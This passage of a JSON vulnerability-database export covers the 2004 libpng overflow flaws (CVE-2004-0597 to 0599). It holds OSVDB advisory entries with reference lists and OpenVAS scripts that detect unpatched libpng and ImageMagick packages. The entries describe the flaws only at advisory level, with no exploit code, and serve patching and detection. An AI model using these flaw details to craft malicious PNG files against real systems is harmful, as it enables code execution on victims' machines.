8316](https://vulners.com/osvdb/OSVDB:8316)\nRedHat RHSA: RHSA-2004:402-08\nRedHat RHSA: RHSA-2004:421-17\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:082\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200408-22.xml\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01063\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57617\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.16/SCOSA-2004.16.txt\nMicrosoft Security Bulletin: MS05-009\nMicrosoft Knowledge Base Article: 890261\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0026.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0034.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 10925\nISS X-Force ID: 19252\n[CVE-2004-0597](https://vulners.com/cve/CVE-2004-0597)\nCIAC Advisory: o-192\nCERT VU: 388984\nCERT VU: 817368\n", "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8312", "id": "OSVDB:8312", "type": "osvdb", "title": "libpng png_handle_sBIT() Local Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0597"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in libpng. The library function png_handle_tRNS fails to perform a length check on PNG images resulting in a buffer overflow. With a specially crafted PNG file, an attacker can cause the execution of code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.2.6 release candidate 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Users of the older 1.0 series should upgrade to libpng-1.0.16 release candidate 1 or higher.\n## Short Description\nA remote overflow exists in libpng. The library function png_handle_tRNS fails to perform a length check on PNG images resulting in a buffer overflow. With a specially crafted PNG file, an attacker can cause the execution of code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.imagemagick.org/\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:213)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_23_libpng.html)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00006.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000564)\n[Vendor Specific Advisory URL](http://bugzilla.mozilla.org/show_bug.cgi?id=251381)\n[Vendor Specific Advisory URL](http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00005.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200408-03.xml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:212)\nUS-CERT Cyber Security Alert: TA04-217A\nSecurity Tracker: 1010854\n[Secunia Advisory ID:12222](https://secuniaresearch.flexerasoftware.com/advisories/12222/)\n[Secunia Advisory ID:12810](https://secuniaresearch.flexerasoftware.com/advisories/12810/)\n[Secunia Advisory ID:13341](https://secuniaresearch.flexerasoftware.com/advisories/13341/)\n[Secunia Advisory ID:22958](https://secuniaresearch.flexerasoftware.com/advisories/22958/)\n[Secunia Advisory ID:12219](https://secuniaresearch.flexerasoftware.com/advisories/12219/)\n[Secunia Advisory ID:12221](https://secuniaresearch.flexerasoftware.com/advisories/12221/)\n[Secunia Advisory ID:12223](https://secuniaresearch.flexerasoftware.com/advisories/12223/)\n[Secunia Advisory ID:12232](https://secuniaresearch.flexerasoftware.com/advisories/12232/)\n[Secunia Advisory ID:12240](https://secuniaresearch.flexerasoftware.com/advisories/12240/)\n[Secunia Advisory ID:12248](https://secuniaresearch.flexerasoftware.com/advisories/12248/)\n[Secunia Advisory ID:15432](https://secuniaresearch.flexerasoftware.com/advisories/15432/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:22957](https://secuniaresearch.flexerasoftware.com/advisories/22957/)\n[Secunia Advisory ID:12220](https://secuniaresearch.flexerasoftware.com/advisories/12220/)\n[Secunia Advisory ID:12234](https://secuniaresearch.flexerasoftware.com/advisories/12234/)\n[Secunia Advisory ID:12249](https://secuniaresearch.flexerasoftware.com/advisories/12249/)\n[Secunia Advisory ID:12283](https://secuniaresearch.flexerasoftware.com/advisories/12283/)\n[Secunia Advisory ID:12354](https://secuniaresearch.flexerasoftware.com/advisories/12354/)\n[Secunia Advisory ID:13291](https://secuniaresearch.flexerasoftware.com/advisories/13291/)\n[Related OSVDB ID: 8313](https://vulners.com/osvdb/OSVDB:8313)\n[Related OSVDB ID: 8312](https://vulners.com/osvdb/OSVDB:8312)\n[Related OSVDB ID: 8314](https://vulners.com/osvdb/OSVDB:8314)\n[Related OSVDB ID: 8315](https://vulners.com/osvdb/OSVDB:8315)\n[Related OSVDB ID: 8316](https://vulners.com/osvdb/OSVDB:8316)\nRedHat RHSA: RHSA-2004-421\nRedHat RHSA: RHSA-2004:402-08\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:082\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200408-22.xml\nOther Advisory URL: http://scary.beasts.org/security/CESA-2004-001.txt\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01063\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57617\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.16/SCOSA-2004.16.txt\nMicrosoft Security Bulletin: MS05-009\nMicrosoft Knowledge Base Article: 890261\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0026.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0034.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 10925\nISS X-Force ID: 19252\n[CVE-2004-0597](https://vulners.com/cve/CVE-2004-0597)\nCIAC Advisory: o-192\nCERT VU: 388984\nCERT VU: 817368\n", "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8326", "id": "OSVDB:8326", "type": "osvdb", "title": "libpng png_handle_tRNS Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:51:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-222-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:53920", "href": "http://plugins.openvas.org/nasl.php?oid=53920", "type": "openvas", "title": "Slackware Advisory SSA:2004-222-01 libpng", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_222_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix security issues. These issues could cause program crashes,\nor possibly allow arbitrary code embedded in a malicious PNG image to execute.\nThe PNG library is widely used within the system, so all sites should upgrade\nto the new libpng package.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2004-222-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-222-01\";\n \nif(description)\n{\n script_id(53920);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2004-222-01 libpng \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i386-1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i486-3\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i486-3\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i486-3\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-222-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231053920", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053920", "type": "openvas", "title": "Slackware Advisory SSA:2004-222-01 libpng", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_222_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53920\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-222-01 libpng\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-222-01\");\n\n script_tag(name:\"insight\", value:\"New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix security issues. These issues could cause program crashes,\nor possibly allow arbitrary code embedded in a malicious PNG image to execute.\nThe PNG library is widely used within the system, so all sites should upgrade\nto the new libpng package.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-222-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i386-1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i486-3\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i486-3\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i486-3\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-223-02.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:53918", "href": "http://plugins.openvas.org/nasl.php?oid=53918", "type": "openvas", "title": "Slackware Advisory SSA:2004-223-02 imagemagick", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_223_02.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New imagemagick packages are available for Slackware 9.1, 10.0,\nand -current to fix security issues with PNG images.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2004-223-02.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-223-02\";\n \nif(description)\n{\n script_id(53918);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2004-223-02 imagemagick \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"imagemagick\", ver:\"5.5.7_25-i486-1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"imagemagick\", ver:\"6.0.4_3-i486-1\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-223-02.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231053918", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053918", "type": "openvas", "title": "Slackware Advisory SSA:2004-223-02 imagemagick", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_223_02.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53918\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-223-02 imagemagick\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(9\\.1|10\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-223-02\");\n\n script_tag(name:\"insight\", value:\"New imagemagick packages are available for Slackware 9.1, 10.0,\nand -current to fix security issues with PNG images.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-223-02.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"imagemagick\", ver:\"5.5.7_25-i486-1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"imagemagick\", ver:\"6.0.4_3-i486-1\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200408-03.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54633", "href": "http://plugins.openvas.org/nasl.php?oid=54633", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200408-03 (libpng)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"libpng contains numerous vulnerabilities potentially allowing an attacker\nto perform a Denial of Service attack or even execute arbitrary code.\";\ntag_solution = \"All libpng users should upgrade to the latest stable version:\n\n # emerge sync\n\n # emerge -pv '>=media-libs/libpng-1.2.5-r8'\n # emerge '>=media-libs/libpng-1.2.5-r8'\n\nYou should also run revdep-rebuild to rebuild any packages that depend on\nolder versions of libpng :\n\n # revdep-rebuild\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200408-03\nhttp://bugs.gentoo.org/show_bug.cgi?id=59424\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200408-03.\";\n\n \n\nif(description)\n{\n script_id(54633);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200408-03 (libpng)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.2.5-r8\"), vulnerable: make_list(\"le 1.2.5-r7\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-20T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52430", "href": "http://plugins.openvas.org/nasl.php?oid=52430", "type": "openvas", "title": "FreeBSD Ports: ImageMagick, ImageMagick-nox11", "sourceData": "#\n#VID a713c0f9-ec54-11d8-9440-000347a4fa7d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n ImageMagick\n ImageMagick-nox11\n\nCVE-2004-0597\nMultiple buffer overflows in libpng 1.2.5 and earlier, as used in\nmultiple products, allow remote attackers to execute arbitrary code\nvia malformed PNG images in which (1) the png_handle_tRNS function\ndoes not properly validate the length of transparency chunk (tRNS)\ndata, or the (2) png_handle_sBIT or (3) png_handle_hIST functions do\nnot perform sufficient bounds checking.\n\nCVE-2004-0598\nThe png_handle_iCCP function in libpng 1.2.5 and earlier allows\nremote attackers to cause a denial of service (application crash)\nvia a certain PNG image that triggers a null dereference.\n\nCVE-2004-0599\nMultiple integer overflows in the (1) png_read_png in pngread.c\nor (2) png_handle_sPLT functions in pngrutil.c or (3) progressive\ndisplay image reading capability in libpng 1.2.5 and earlier allow\nremote attackers to cause a denial of service (application crash)\nvia a malformed PNG image.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://studio.imagemagick.org/pipermail/magick-users/2004-August/013218.html\nhttp://freshmeat.net/releases/169228\nhttp://secunia.com/advisories/12236\nhttp://www.freebsd.org/ports/portaudit/f9e3e60b-e650-11d8-9b0a-000347a4fa7d.html\nhttp://www.vuxml.org/freebsd/a713c0f9-ec54-11d8-9440-000347a4fa7d.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52430);\n script_version(\"$Revision: 4118 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-20 07:32:38 +0200 (Tue, 20 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", 